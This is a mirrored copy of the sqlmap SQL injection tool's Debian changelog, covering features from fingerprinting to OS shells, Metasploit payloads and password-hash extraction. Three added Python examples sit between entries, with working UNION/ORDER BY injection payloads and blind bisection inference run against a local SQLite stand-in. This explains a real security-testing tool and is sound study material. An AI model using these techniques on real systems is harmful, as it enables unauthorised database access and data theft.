mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-01-24 08:14:24 +03:00
400 lines
20 KiB
Plaintext
sqlmap (0.7-1) stable; urgency=low

  * Adapted Metasploit wrapping functions to work with latest 3.3
    development version too.
  * Adjusted code to make sqlmap 0.7 work again on Mac OSX too.
  * Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or
    --os-bof is selected) when running under Windows because msfconsole
    and msfcli are not supported on the native Windows Ruby interpreter.
    This makes sqlmap 0.7 work again on Windows too.
  * Minor improvement so that sqlmap also tests all parameters with no
    value (e.g. par=).
  * HTTPS requests over HTTP proxy now work on Python 2.4, 2.5 and
    2.6+.
  * Major bug fix to sql-query/sql-shell features.
  * Major bug fix in --read-file option.
  * Major silent bug fix to multi-threading functionality.
  * Fixed the web backdoor functionality (for MySQL) when (usually) stacked
    queries are not supported and --os-shell is provided.
  * Fixed MySQL 'comment injection' version fingerprint.
  * Fixed basic Microsoft SQL Server 2000 fingerprint.
  * Many minor bug fixes and code refactoring.

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sat, 25 Jul 2009 10:00:00 +0000

sqlmap (0.7rc1-1) stable; urgency=low

  * Added support to execute arbitrary commands on the database server
    underlying operating system, either returning the standard output or not,
    via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored
    procedure on Microsoft SQL Server;
  * Added support for out-of-band connection between the attacker box and
    the database server underlying operating system via stand-alone payload
    stager created by Metasploit and supporting Meterpreter, shell and VNC
    payloads for both Windows and Linux;
  * Added support for out-of-band connection via Microsoft SQL Server 2000
    and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer
    overflow (MS09-004) exploitation with multi-stage Metasploit payload
    support;
  * Added support for out-of-band connection via SMB reflection attack with
    UNC path request from the database server to the attacker box by using
    the Metasploit smb_relay exploit;
  * Added support to read and write (upload) both text and binary files on
    the database server underlying file system for MySQL, PostgreSQL and
    Microsoft SQL Server;
  * Added database process' user privilege escalation via Windows Access
    Tokens kidnapping on MySQL and Microsoft SQL Server via either
    Meterpreter's incognito extension or Churrasco stand-alone executable;
  * Sped up the inference algorithm by providing the minimum required
    charset for the query output;
  * Major bug fix in the comparison algorithm to correctly handle also the
    case where the url is stable and the False response changes the page
    content very little;
  * Many minor bug fixes, minor enhancements and layout adjustments.

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Wed, 22 Apr 2009 10:30:00 +0000

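The page comparison logic this entry fixes (and which the 0.6.4 entry below introduces with the difflib SequenceMatcher, with --string, --regexp and --excl-reg from 0.6.3 as alternatives) is sketched below as an added example in Python. It is not sqlmap's own code: the sample responses, the PageComparator class and its 0.005 ratio margin are constructed here to illustrate the stable-url case, where the False response changes only one word, next to the unstable-url case, where the page drifts on its own.

```python
import difflib
import re

# Constructed sample responses (not captured from any real target).
STABLE_TRUE = "<html><body><h1>Product 7</h1><p>In stock: yes</p></body></html>"
STABLE_FALSE = "<html><body><h1>Product 7</h1><p>In stock: no</p></body></html>"


def dynamic_page(nonce, in_stock=True):
    """Page of an 'unstable' url: a per-request token changes every time."""
    answer = "yes" if in_stock else "no"
    return (f"<html><!-- req {nonce} --><body><h1>Product 7</h1>"
            f"<p>In stock: {answer}</p></body></html>")


def ratio(a, b):
    return difflib.SequenceMatcher(None, a, b).ratio()


class PageComparator:
    """Decide whether a response matches the baseline (the 'True' page).

    Built from two requests to the same url with the original parameters,
    as a stability check: identical pages mean the url is stable and an
    exact match can be demanded; otherwise the ratio between the two
    samples measures how much the page drifts on its own.
    """
    MARGIN = 0.005  # assumption: tolerance below the observed noise ratio

    def __init__(self, page1, page2, string=None, regexp=None, excl_reg=None):
        self.string = string
        self.regexp = regexp
        self.excl_reg = re.compile(excl_reg) if excl_reg else None
        self.baseline = self._clean(page1)
        second = self._clean(page2)
        self.stable = self.baseline == second
        self.noise = ratio(self.baseline, second)   # 1.0 when stable

    def _clean(self, page):
        # --excl-reg: strip dynamic content before comparing
        return self.excl_reg.sub("", page) if self.excl_reg else page

    def is_true(self, page):
        page = self._clean(page)
        if self.string is not None:            # --string
            return self.string in page
        if self.regexp is not None:            # --regexp
            return re.search(self.regexp, page, re.I | re.M) is not None
        if self.stable:
            # A False response may change a single word on an otherwise
            # identical page, so on a stable url any change at all counts.
            return page == self.baseline
        # Unstable url: only differences beyond the page's own drift count.
        return ratio(self.baseline, page) >= self.noise - self.MARGIN


def demo():
    """Classify constructed True/False responses under three setups."""
    stable = PageComparator(STABLE_TRUE, STABLE_TRUE)
    unstable = PageComparator(dynamic_page("000001"), dynamic_page("000002"))
    excluded = PageComparator(dynamic_page("000001"), dynamic_page("000002"),
                              excl_reg=r"<!-- req \d+ -->")
    return {
        "stable": (stable.stable, stable.is_true(STABLE_TRUE),
                   stable.is_true(STABLE_FALSE)),
        "unstable": (unstable.stable, unstable.is_true(dynamic_page("000003")),
                     unstable.is_true(dynamic_page("000004", in_stock=False))),
        "excl_reg": (excluded.stable, excluded.is_true(dynamic_page("000005")),
                     excluded.is_true(dynamic_page("000006", in_stock=False))),
    }
```

The third setup shows why the exclusion options exist: once the per-request token is stripped, the "unstable" url becomes stable and the exact comparison applies again, which is more reliable than any ratio threshold.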
sqlmap (0.6.4-1) stable; urgency=low

  * Major enhancement to make the comparison algorithm work properly also
    on unstable urls automatically, by using the difflib SequenceMatcher
    object;
  * Major enhancement to support SQL data definition statements, SQL data
    manipulation statements, etc. from the user in SQL query and SQL shell if
    stacked queries are supported by the web application technology;
  * Major speed increase in DBMS basic fingerprint;
  * Minor enhancement to support an option (--is-dba) to show if the
    current user is a database management system administrator;
  * Minor enhancement to support an option (--union-tech) to specify the
    technique to use to detect the number of columns used in the web
    application SELECT statement: NULL bruteforcing (default) or ORDER BY
    clause bruteforcing;
  * Added internal support to forge CASE statements, used only by --is-dba
    query at the moment;
  * Minor layout adjustment to the --update output;
  * Increased default timeout to 30 seconds;
  * Major bug fix to correctly handle custom SQL "limited" queries on
    Microsoft SQL Server and Oracle;
  * Major bug fix to avoid tracebacks when multiple targets are specified
    and one of them is not reachable;
  * Minor bug fix to make the Partial UNION query SQL injection technique
    work properly also on Oracle and Microsoft SQL Server;
  * Minor bug fix to make --postfix work even if --prefix is not
    provided;
  * Updated documentation.

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Tue, 3 Feb 2009 23:30:00 +0000

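The two column-count detection techniques selectable with --union-tech in the entry above, as an added example in Python (not sqlmap's code). The target is a constructed, deliberately vulnerable query over an in-memory SQLite database standing in for the web application; the example also goes one step beyond the entry by bisecting the ORDER BY position, which the monotonic accepted/error behaviour of ORDER BY allows and the all-or-nothing UNION SELECT NULL probe does not.

```python
import sqlite3


class Target:
    """Constructed stand-in for a vulnerable web application: the request
    parameter is concatenated unescaped into a three-column SELECT."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.executescript(
            "CREATE TABLE users(id INTEGER, name TEXT, email TEXT);"
            "INSERT INTO users VALUES (1,'alice','alice@example.org'),"
            "(2,'bob','bob@example.org');")
        self.requests = 0

    def ok(self, param):
        """One 'HTTP request': True if the page renders, False on a DB error."""
        self.requests += 1
        try:
            self.conn.execute(
                "SELECT id, name, email FROM users WHERE id=" + param).fetchall()
            return True
        except sqlite3.Error:
            return False


def columns_by_null(target, max_cols=20):
    """NULL bruteforcing: UNION SELECT NULL,... only succeeds when the
    number of NULLs equals the number of columns of the original SELECT."""
    for n in range(1, max_cols + 1):
        if target.ok("1 UNION SELECT " + ",".join(["NULL"] * n) + "--"):
            return n
    return None


def columns_by_order_by(target, max_cols=20):
    """ORDER BY bruteforcing: ORDER BY n is accepted for every n up to the
    column count and raises an error for the first n beyond it."""
    for n in range(1, max_cols + 1):
        if not target.ok(f"1 ORDER BY {n}--"):
            return n - 1
    return None


def columns_by_order_by_bisect(target, max_cols=64):
    """Same ORDER BY oracle, binary-searched: about log2(max_cols) requests
    instead of one per column. If the answer equals max_cols the real count
    may be larger and max_cols should be raised."""
    if not target.ok("1 ORDER BY 1--"):
        return None
    lo, hi = 1, max_cols        # invariant: ORDER BY lo is accepted
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if target.ok(f"1 ORDER BY {mid}--"):
            lo = mid
        else:
            hi = mid - 1
    return lo


def detect_all():
    """Run each technique against a fresh target: {name: (columns, requests)}."""
    results = {}
    for fn in (columns_by_null, columns_by_order_by, columns_by_order_by_bisect):
        t = Target()
        results[fn.__name__] = (fn(t), t.requests)
    return results
```

For a three-column query the sequential probes win on request count; the bisected ORDER BY only pays off on wide SELECTs, and it relies on the application surfacing the ORDER BY error as a visibly different page, the same condition the ORDER BY technique needs in the first place.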
sqlmap (0.6.3-1) stable; urgency=low

  * Major enhancement to get list of targets to test from Burp proxy
    (http://portswigger.net/suite/) requests log file path or WebScarab
    proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
    'conversations/' folder path by providing option -l <filepath>;
  * Major enhancement to support Partial UNION query SQL injection
    technique too;
  * Major enhancement to test if the web application technology supports
    stacked queries (multiple statements) by providing option
    --stacked-test, which will then also be used someday by the takeover
    functionality;
  * Major enhancement to test if the injectable parameter is affected by
    a time based blind SQL injection technique by providing option
    --time-test;
  * Minor enhancement to fingerprint the web server operating system and
    the web application technology by parsing some HTTP response headers;
  * Minor enhancement to fingerprint the back-end DBMS operating system by
    parsing the DBMS banner value when -b option is provided;
  * Minor enhancement to be able to specify the number of seconds before
    the connection times out by providing option --timeout #, default is set
    to 10 seconds and must be 3 or higher;
  * Minor enhancement to be able to specify the number of seconds to wait
    between each HTTP request by providing option --delay #;
  * Minor enhancement to be able to get the injection payload --prefix and
    --postfix from user;
  * Minor enhancement to be able to enumerate table columns and dump table
    entries, also when the database name is not provided, by using the
    current database on MySQL and Microsoft SQL Server, the 'public'
    schema on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
  * Minor enhancement to support also --regexp, --excl-str and --excl-reg
    options rather than only --string when comparing HTTP responses page
    content;
  * Minor enhancement to be able to specify extra HTTP headers by providing
    option --headers. By default Accept, Accept-Language and Accept-Charset
    headers are set;
  * Minor improvement to be able to provide CU (as current user) as user
    value (-U) when enumerating users privileges or users passwords;
  * Minor improvements to sqlmap Debian package files;
  * Minor improvement to use Python psyco (http://psyco.sourceforge.net/)
    library if available to speed up the sqlmap algorithmic operations;
  * Minor improvement to retry the HTTP request up to three times in case
    an exception is raised during the connection to the target url;
  * Major bug fix to correctly enumerate columns on Microsoft SQL Server;
  * Major bug fix so that when the user provides a SELECT statement to be
    processed with an asterisk as columns, it now also works if no database
    name is specified in the FROM clause;
  * Minor bug fix to correctly dump table entries when the column is
    provided;
  * Minor bug fix to correctly handle session.error, session.timeout and
    httplib.BadStatusLine exceptions in HTTP requests;
  * Minor bug fix to correctly catch connection exceptions and notify
    the user also if they occur within a thread;
  * Increased default output level from 0 to 1;
  * Updated documentation.

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Thu, 18 Dec 2008 10:00:00 +0000

sqlmap (0.6.2-1) stable; urgency=low

  * Major bug fix to correctly dump table entries when --stop is not
    specified;
  * Major bug fix so that the users' privileges enumeration now works
    properly also on both MySQL < 5.0 and MySQL >= 5.0;
  * Major bug fix when the request is POST to also send the GET parameters
    if any have been provided;
  * Major bug fix to correctly update sqlmap to the latest stable release
    with command line --update;
  * Major bug fix so that when the expected value of a query (count
    variable) is an integer and, for some reason, its resumed value from
    the session file is a string or a binary file, the query is executed
    again and its new output saved to the session file;
  * Minor bug fix in MySQL comment injection fingerprint technique;
  * Minor improvement to correctly enumerate tables, columns and dump
    table entries on Oracle and on PostgreSQL when the database name is
    not the 'public' schema or a system database;
  * Minor improvement to be able to dump entries on MySQL < 5.0 when
    database name, table name and column(s) are provided;
  * Updated the database management system fingerprint checks to correctly
    identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
  * More user-friendly warning messages.

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun, 2 Nov 2008 19:00:00 +0000

sqlmap (0.6.1-1) stable; urgency=low

  * Major bug fix to blind SQL injection bisection algorithm to handle an
    exception;
  * Added a Metasploit Framework 3 auxiliary module to run sqlmap;
  * Implemented possibility to test for and inject also on LIKE
    statements;
  * Implemented --start and --stop options to set the first and the last
    table entry to dump;
  * Added non-interactive/batch-mode (--batch) option to make it easy to
    wrap sqlmap in Metasploit and any other tool;
  * Minor enhancement to save also the length of query output in the
    session file when retrieving the query output length for ETA or for
    resume purposes;
  * Changed the order in which sqlmap dumps table entries from column by
    column to row by row. Now it also dumps entries as they are stored in
    the tables, not forcing the entries' order alphabetically anymore;
  * Minor bug fix to correctly handle parameters' value with % character.

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Fri, 20 Oct 2008 10:00:00 +0000

sqlmap (0.6-1) stable; urgency=low

  * Complete code refactor and many bugs fixed;
  * Added multithreading support to set the maximum number of concurrent
    HTTP requests;
  * Implemented SQL shell (--sql-shell) functionality and fixed SQL query
    (--sql-query, before called -e) to be able to run whatever SELECT
    statement and get its output in both inband and blind SQL injection
    attack;
  * Added an option (--privileges) to retrieve DBMS users privileges, it
    also notifies if the user is a DBMS administrator;
  * Added support (-c) to read options from configuration file, an example
    of valid INI file is sqlmap.conf, and support (--save) to save command
    line options on a configuration file;
  * Created a function that updates the whole sqlmap to the latest stable
    version available by running sqlmap with --update option;
  * Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.)
    installation binary packages;
  * Created sqlmap .exe (Windows) portable executable;
  * Save a lot more information to the session file, useful when
    resuming injection on the same target to not lose time on identifying
    injection, UNION fields and back-end DBMS twice or more times;
  * Improved automatic check for parenthesis when testing and forging SQL
    query vector;
  * Now it checks for SQL injection on all GET/POST/Cookie parameters then
    it lets the user select which parameter to perform the injection on in
    case that more than one is injectable;
  * Implemented support for HTTPS requests over HTTP(S) proxy;
  * Added a check to handle NULL or not available queries output;
  * More entropy (randomStr() and randomInt() functions in
    lib/core/common.py) in inband SQL injection concatenated query and in
    AND condition checks;
  * Improved XML files structure;
  * Implemented the possibility to change the HTTP Referer header;
  * Added support to resume from session file also when running with
    inband SQL injection attack;
  * Added an option (--os-shell) to execute operating system commands if
    the back-end DBMS is MySQL, the web server has the PHP engine active
    and permits write access on a directory within the document root;
  * Added a check to assure that the provided string to match (--string)
    is within the page content;
  * Fixed various queries in XML file;
  * Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted
    the library to parse it;
  * Fixed password fetching function, mainly for Microsoft SQL Server and
    reviewed the password hashes parsing function;
  * Major bug fixed to avoid tracebacks when the testable parameter(s) is
    dynamic, but not injectable;
  * Enhanced logging system: added three more levels of verbosity to show
    also HTTP sent and received traffic;
  * Enhancement to handle Set-Cookie from target url and automatically
    re-establish the Session when it expires;
  * Added support to inject also on Set-Cookie parameters;
  * Implemented TAB completion and command history on both --sql-shell and
    --os-shell;
  * Renamed some command line options;
  * Added a conversion library;
  * Added code schema and reminders for future developments;
  * Added Copyright comment and $Id$;
  * Updated the command line layout and help messages;
  * Updated some docstrings;
  * Updated documentation files.

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon, 1 Sep 2008 10:00:00 +0100

sqlmap (0.5-1) stable; urgency=low

  * Added support for Oracle database management system;
  * Extended inband SQL injection functionality (--union-use) to all
    other possible queries since it only worked with -e and --file on
    all DBMS plugins;
  * Added support to extract database users password hash on Microsoft
    SQL Server;
  * Added a fuzzer function with the aim to parse HTML page looking
    for standard database error messages consequently improving
    database fingerprinting;
  * Added support for SQL injection on HTTP Cookie and User-Agent headers;
  * Reviewed HTTP request library (lib/request.py) to support the
    extended inband SQL injection functionality. Split getValue()
    into getInband() and getBlind();
  * Major enhancements in common library and added checkForBrackets()
    method to check if the bracket(s) are needed to perform a UNION query
    SQL injection attack;
  * Implemented --dump-all functionality to dump entire DBMS data from
    all databases tables;
  * Added support to exclude DBMS system databases when enumerating
    tables and dumping their entries (--exclude-sysdbs);
  * Implemented in the Dump.dbTableValues() method the automatic saving
    of dumped data to CSV files in the csv/ folder by default;
  * Added DB2, Informix and Sybase DBMS error messages and minor
    improvements in xml/errors.xml;
  * Major improvement in all three DBMS plugins so that now sqlmap does not
    get the entire databases' tables structure when all of database/table/
    column are specified to be dumped;
  * Important fixes in lib/option.py to make sqlmap work properly also
    with python 2.5 and to make the CSV dump files creation work also
    under the Windows operating system (function __setCSVDir()); fixed
    also in lib/dump.py;
  * Minor enhancement in lib/injection.py to randomize the number
    requested to test the presence of a SQL injection affected parameter
    and implemented the possibility to break (q) the for cycle when
    using the google dork option (-g);
  * Minor fix in lib/request.py to properly encode the url to request
    in case the "fixed" part of the url has blank spaces;
  * More minor layout enhancements in some libraries;
  * Renamed DBMS plugins;
  * Complete code refactoring, a lot of minor and some major fixes in
    libraries, many minor improvements;
  * Updated all documentation files.

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun, 4 Nov 2007 20:00:00 +0100

sqlmap (0.4-1) stable; urgency=low

  * Added DBMS fingerprint based also upon HTML error messages parsing
    defined in lib/parser.py which reads an XML file defining default
    error messages for each supported DBMS;
  * Added Microsoft SQL Server extensive DBMS fingerprint checks based
    upon accurate '@@version' parsing matching on an XML file to get also
    the exact patching level of the DBMS;
  * Added support for query ETA (Estimated Time of Arrival) real time
    calculation (--eta);
  * Added support to extract database management system users password
    hash on MySQL and PostgreSQL (--passwords);
  * Added docstrings to all functions, classes and methods, consequently
    released the sqlmap development documentation
    <http://sqlmap.sourceforge.net/dev/>;
  * Implemented Google dorking feature (-g) to take advantage of Google
    results affected by SQL injection to perform the other command line
    arguments on their DBMS;
  * Improved logging functionality: switched from banal 'print' to the
    Python native logging library;
  * Added support for more than one parameter in '-p' command line
    option;
  * Added support for HTTP Basic and Digest authentication methods
    (--basic-auth and --digest-auth);
  * Added the command line option '--remote-dbms' to manually specify
    the remote DBMS;
  * Major improvements in union.UnionCheck() and union.UnionUse()
    functions to make it possible to exploit inband SQL injection also
    with database comment characters ('--' and '#') in UNION query
    statements;
  * Added the possibility to save the output into a file while performing
    the queries (-o OUTPUTFILE) so it is possible to stop and resume the
    same query output retrieval at a later time (--resume);
  * Added support to specify the database table column to enumerate
    (-C COL);
  * Added inband SQL injection (UNION query) support (--union-use);
  * Complete code refactoring, a lot of minor and some major fixes in
    libraries, many minor improvements;
  * Reviewed the directory tree structure;
  * Split lib/common.py: inband injection functionalities are now
    moved to lib/union.py;
  * Updated documentation files.

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Fri, 15 Jun 2007 20:00:00 +0100

sqlmap (0.3-1) stable; urgency=low

  * Added module for MS SQL Server;
  * Strongly improved MySQL dbms active fingerprint and added MySQL
    comment injection check;
  * Added PostgreSQL dbms active fingerprint;
  * Added support for string match (--string);
  * Added support for UNION check (--union-check);
  * Removed duplicated code, delegated most of features to the engine
    in common.py and option.py;
  * Added support for --data command line argument to pass the string
    for POST requests;
  * Added encodeParams() method to encode url parameters before making
    the http request;
  * Many bug fixes;
  * Rewritten documentation files;
  * Complete code restyling.

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sat, 20 Jan 2007 20:00:00 +0100

sqlmap (0.2-1) stable; urgency=low

  * complete refactor of entire program;
  * added TODO and THANKS files;
  * added some papers references in README file;
  * moved headers to user-agents.txt, now -f parameter specifies a file
    (user-agents.txt) and randomizes the selection of User-Agent header;
  * strongly improved program plugins (mysqlmap.py and postgres.py),
    major enhancements:
      * improved active mysql fingerprint check_dbms();
      * improved enumeration functions for both databases;
      * minor changes in the unescape() functions;
      * replaced old inference algorithm with a new bisection algorithm.
  * reviewed command line parameters, now with -p it's possible to
    specify the parameter you know is vulnerable to sql injection,
    this way the script won't perform the sql injection checks itself;
    removed the TOKEN parameter;
  * improved Common class, adding support for http proxy and http post
    method in hash_page;
  * added OptionCheck class in option.py which performs all needed checks
    on command line parameters and values;
  * added InjectionCheck class in injection.py which performs check on
    url stability, dynamics of parameters and injection on dynamic url
    parameters;
  * improved output methods in dump.py;
  * layout enhancement on main program file (sqlmap.py), adapted to call
    new option/injection classes and improvements on catching of
    exceptions.

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Wed, 13 Dec 2006 20:00:00 +0100

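The bisection algorithm that the 0.2 entry above introduced for blind inference, together with the "minimum required charset" speed-up from the 0.7rc1 entry, as an added example in Python (not sqlmap's own code). The oracle is constructed: it evaluates the injected boolean condition against an in-memory SQLite table instead of comparing web pages, and the charset table, the length bound and the one-request confirmation of each character are this example's choices, added so that a charset that is too narrow fails loudly instead of returning a wrong value.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    "CREATE TABLE users(id INTEGER, name TEXT);"
    "INSERT INTO users VALUES (1,'alice'),(2,'bob');")


def oracle(condition):
    """True iff the injected boolean condition holds (one 'HTTP request')."""
    return bool(conn.execute(f"SELECT ({condition})").fetchone()[0])


# Code point ranges; which one applies depends on what the query can return
# (a COUNT(*) is digits only, a lowercase username fits 'lower', ...).
# Assumed table for this example, not sqlmap's.
CHARSETS = {"printable": (32, 126), "digits": (48, 57), "lower": (97, 122)}


def bisect_int(oracle, expr, lo, hi, counter):
    """Find the integer value of expr, known to lie in [lo, hi], asking
    only 'expr > mid' questions: about log2(hi - lo) requests."""
    while lo < hi:
        mid = (lo + hi) // 2
        counter[0] += 1
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def infer_value(oracle, expr, charset="printable", max_len=64):
    """Return (inferred string, number of requests used).

    Length first, then one bisection per character over the chosen
    charset; an output longer than max_len is reported as max_len chars."""
    lo, hi = CHARSETS[charset]
    counter = [0]
    length = bisect_int(oracle, f"length(({expr}))", 0, max_len, counter)
    out = []
    for pos in range(1, length + 1):
        code_expr = f"unicode(substr(({expr}),{pos},1))"
        code = bisect_int(oracle, code_expr, lo, hi, counter)
        # One extra request confirms the hit: a too-narrow charset would
        # otherwise silently yield the wrong character.
        counter[0] += 1
        if not oracle(f"{code_expr} = {code}"):
            raise ValueError(f"charset {charset!r} does not cover position {pos}")
        out.append(chr(code))
    return "".join(out), counter[0]


def compare_charsets():
    """Same query with and without the minimum charset: {charset: (value, requests)}."""
    name = "(SELECT name FROM users WHERE id=1)"
    return {cs: infer_value(oracle, name, cs) for cs in ("printable", "lower")}
```

Restricting the range from 95 printable code points to 26 lowercase letters saves one or two requests per character; on a real target every request is a round trip, so the saving is the point of passing the expected charset of each query to the inference engine.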